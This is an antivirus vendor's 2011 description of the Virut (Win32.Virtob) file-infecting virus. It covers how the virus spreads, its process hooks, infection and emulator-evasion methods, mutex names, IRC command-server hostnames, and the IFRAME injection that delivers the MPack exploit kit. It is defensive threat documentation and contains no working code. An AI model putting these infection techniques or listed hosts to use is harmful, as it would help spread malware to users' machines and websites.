Home / malware Win32.Virtob.{2,3,4}.Gen
First posted on 21 November 2011.
Source: BitDefenderAliases :
Win32.Virtob.{2,3,4}.Gen is also known as Generic.Virtob.1, Win32.Virut, W32/Virut, Virus.Win32.Virut, Virus:Win32/Virut, W32.Virut, W32/Vetor.
Explanation :
This virus is a polymorphic, memory-resident file-infector, with backdoor behaviour.
The author spreads it by posting it as a crack for different applications or games, on several forums. He also uses a "pay-per-install" affiliate program, hosted at exerevenue.com, but the executable he pretends users have to run to earn cash is the virus itself.
Once executed, it injects itself into WINLOGON, creates a new thread in that process, and passes the execution control to the host file.
It also hooks the following functions in each running process (in NTDLL module):
NtCreateFileNtOpenFileNtCreateProcessNtCreateProcessEx
so that every time an infected process calls one of these functions, the execution is passed to the virus, wich infects the accessed file, and then returns the control to the original function.
It infects EXE and SCR files, using different infection techniques:
Appending to the last section of the victim, and setting the Entry Point directly to the viral code.
Entry Point Obscuring (EPO) - it searches for an IAT call in the code section, and patches it with a call to it's polymorphic decryptor.
Overwriting some bytes at the Entry Point with it's decryptor.Inserting into the slack space of the code section, if it there is enough space for it's polymorphic decryptor.Later versions (the ones detected with Win32.Virtob.6.Gen) have a single infection method (the first one in the list).
The virus is able to avoid emulators and virtual machines.
To ensure there's only one instance of it running in the system, it creates an event with one of the following names:
VT_3VT_4VevT
Vx_4
It avoids infecting files that containg the following strings:
WINCWCUNWC32PSTO
It tries to connect to some IRC server, and join a certain channel. The IRC server can be:
proxim.ircgalaxy.plproxima.ircgalaxy.pl
proxim.ntkrnlpa.info
ircd.zief.pl
Once it joins the channel, it waits for commands that instruct it to download several files from Internet, and then execute them.
One of these files is a second component of the virus (it is detected as Win32.Virtob.Dld.?). It downloads other files (other downloaders), and infects HTM, PHP and ASP files found on all fixed and removable drives, and also on network shares, by inserting an IFRAME right before the BODY tag.
The IFRAME contains MPack, an exploit kit that includes:
MS06-014MS06-006MS06-044MS06-071MS06-057WinZip ActiveX overflow QuickTime overflow MS07-017They are used to download and execute a remote executable file (the latest version of the virus).
By infecting ASP, HTM and PHP scripts on every infected machine, it is possible to infect scripts that serve webpages, so the potential of spreading is bigger (it is actually acting like a worm).
Some versions have a piece of a Friedrich Nietzsche's poem. Usually this is:
O noon of life! O time to celebrate!
O summer garden!
Relentlessly happy and expectant, standing: -
Watching all day and night, for friends I wait:
Where are you, friends? Come! It is time! It's late!
or:
The glacier's gray adorned itself for you
Today with roses;
The brook seeks you, and full of longing rises
The wind, the cloud, into the vaulting blue
To look for you from dizzy bird's-eye view.
It is possible that some versions are detected by BitDefender with names like:
Generic.Virtob.1.????????DeepScan:Generic.Virtob.1.????????Win32.Virtob.??
Note: there are a lot of versions that contain bugs, so not all the described behavior actually works as expected.Last update 21 November 2011